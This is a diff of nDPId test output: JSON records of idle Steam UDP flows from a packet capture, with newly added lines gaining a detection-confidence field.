-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
